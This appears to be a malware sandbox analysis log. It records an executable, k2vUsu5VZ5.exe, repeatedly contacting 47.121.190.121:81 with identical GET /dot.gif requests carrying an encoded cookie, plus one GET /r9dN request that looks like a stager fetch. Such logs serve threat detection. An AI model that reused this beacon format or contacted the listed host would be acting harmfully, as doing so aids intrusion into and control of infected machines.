            Source: global trafficHTTP traffic detected: GET /dot.gif HTTP/1.1Accept: */*Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /dot.gif HTTP/1.1Accept: */*Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /dot.gif HTTP/1.1Accept: */*Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /dot.gif HTTP/1.1Accept: */*Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /dot.gif HTTP/1.1Accept: */*Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /dot.gif HTTP/1.1Accept: */*Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /dot.gif HTTP/1.1Accept: */*Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /dot.gif HTTP/1.1Accept: */*Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /dot.gif HTTP/1.1Accept: */*Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /dot.gif HTTP/1.1Accept: */*Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /dot.gif HTTP/1.1Accept: */*Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /dot.gif HTTP/1.1Accept: */*Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /dot.gif HTTP/1.1Accept: */*Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /dot.gif HTTP/1.1Accept: */*Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /dot.gif HTTP/1.1Accept: */*Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /dot.gif HTTP/1.1Accept: */*Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /dot.gif HTTP/1.1Accept: */*Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /dot.gif HTTP/1.1Accept: */*Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /dot.gif HTTP/1.1Accept: */*Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /dot.gif HTTP/1.1Accept: */*Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /dot.gif HTTP/1.1Accept: */*Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /dot.gif HTTP/1.1Accept: */*Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /dot.gif HTTP/1.1Accept: */*Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /dot.gif HTTP/1.1Accept: */*Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
            Source: unknownTCP traffic detected without corresponding DNS query: 47.121.190.121
            Source: unknownTCP traffic detected without corresponding DNS query: 47.121.190.121
            Source: unknownTCP traffic detected without corresponding DNS query: 47.121.190.121
            Source: unknownTCP traffic detected without corresponding DNS query: 47.121.190.121
            Source: unknownTCP traffic detected without corresponding DNS query: 47.121.190.121
            Source: unknownTCP traffic detected without corresponding DNS query: 47.121.190.121
            Source: unknownTCP traffic detected without corresponding DNS query: 47.121.190.121
            Source: unknownTCP traffic detected without corresponding DNS query: 47.121.190.121
            Source: unknownTCP traffic detected without corresponding DNS query: 47.121.190.121
            Source: unknownTCP traffic detected without corresponding DNS query: 47.121.190.121
            Source: unknownTCP traffic detected without corresponding DNS query: 47.121.190.121
            Source: unknownTCP traffic detected without corresponding DNS query: 47.121.190.121
            Source: unknownTCP traffic detected without corresponding DNS query: 47.121.190.121
            Source: unknownTCP traffic detected without corresponding DNS query: 47.121.190.121
            Source: unknownTCP traffic detected without corresponding DNS query: 47.121.190.121
            Source: unknownTCP traffic detected without corresponding DNS query: 47.121.190.121
            Source: unknownTCP traffic detected without corresponding DNS query: 47.121.190.121
            Source: unknownTCP traffic detected without corresponding DNS query: 47.121.190.121
            Source: unknownTCP traffic detected without corresponding DNS query: 47.121.190.121
            Source: unknownTCP traffic detected without corresponding DNS query: 47.121.190.121
            Source: unknownTCP traffic detected without corresponding DNS query: 47.121.190.121
            Source: unknownTCP traffic detected without corresponding DNS query: 47.121.190.121
            Source: unknownTCP traffic detected without corresponding DNS query: 47.121.190.121
            Source: unknownTCP traffic detected without corresponding DNS query: 47.121.190.121
            Source: unknownTCP traffic detected without corresponding DNS query: 47.121.190.121
            Source: unknownTCP traffic detected without corresponding DNS query: 47.121.190.121
            Source: unknownTCP traffic detected without corresponding DNS query: 47.121.190.121
            Source: unknownTCP traffic detected without corresponding DNS query: 47.121.190.121
            Source: unknownTCP traffic detected without corresponding DNS query: 47.121.190.121
            Source: unknownTCP traffic detected without corresponding DNS query: 47.121.190.121
            Source: unknownTCP traffic detected without corresponding DNS query: 47.121.190.121
            Source: unknownTCP traffic detected without corresponding DNS query: 47.121.190.121
            Source: unknownTCP traffic detected without corresponding DNS query: 47.121.190.121
            Source: unknownTCP traffic detected without corresponding DNS query: 47.121.190.121
            Source: unknownTCP traffic detected without corresponding DNS query: 47.121.190.121
            Source: unknownTCP traffic detected without corresponding DNS query: 47.121.190.121
            Source: unknownTCP traffic detected without corresponding DNS query: 47.121.190.121
            Source: unknownTCP traffic detected without corresponding DNS query: 47.121.190.121
            Source: unknownTCP traffic detected without corresponding DNS query: 47.121.190.121
            Source: unknownTCP traffic detected without corresponding DNS query: 47.121.190.121
            Source: unknownTCP traffic detected without corresponding DNS query: 47.121.190.121
            Source: unknownTCP traffic detected without corresponding DNS query: 47.121.190.121
            Source: unknownTCP traffic detected without corresponding DNS query: 47.121.190.121
            Source: unknownTCP traffic detected without corresponding DNS query: 47.121.190.121
            Source: unknownTCP traffic detected without corresponding DNS query: 47.121.190.121
            Source: unknownTCP traffic detected without corresponding DNS query: 47.121.190.121
            Source: unknownTCP traffic detected without corresponding DNS query: 47.121.190.121
            Source: unknownTCP traffic detected without corresponding DNS query: 47.121.190.121
            Source: unknownTCP traffic detected without corresponding DNS query: 47.121.190.121
            Source: unknownTCP traffic detected without corresponding DNS query: 47.121.190.121
            Source: C:\Users\user\Desktop\k2vUsu5VZ5.exeCode function: 0_2_0388E3A4 _snprintf,_snprintf,_snprintf,HttpOpenRequestA,HttpSendRequestA,InternetQueryDataAvailable,InternetCloseHandle,InternetReadFile,InternetCloseHandle,0_2_0388E3A4
            Source: global trafficHTTP traffic detected: GET /r9dN HTTP/1.1User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; WOW64; Trident/6.0; Touch)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /dot.gif HTTP/1.1Accept: */*Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /dot.gif HTTP/1.1Accept: */*Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /dot.gif HTTP/1.1Accept: */*Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /dot.gif HTTP/1.1Accept: */*Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /dot.gif HTTP/1.1Accept: */*Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /dot.gif HTTP/1.1Accept: */*Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /dot.gif HTTP/1.1Accept: */*Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /dot.gif HTTP/1.1Accept: */*Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /dot.gif HTTP/1.1Accept: */*Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /dot.gif HTTP/1.1Accept: */*Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /dot.gif HTTP/1.1Accept: */*Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /dot.gif HTTP/1.1Accept: */*Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /dot.gif HTTP/1.1Accept: */*Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /dot.gif HTTP/1.1Accept: */*Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /dot.gif HTTP/1.1Accept: */*Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /dot.gif HTTP/1.1Accept: */*Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /dot.gif HTTP/1.1Accept: */*Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /dot.gif HTTP/1.1Accept: */*Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
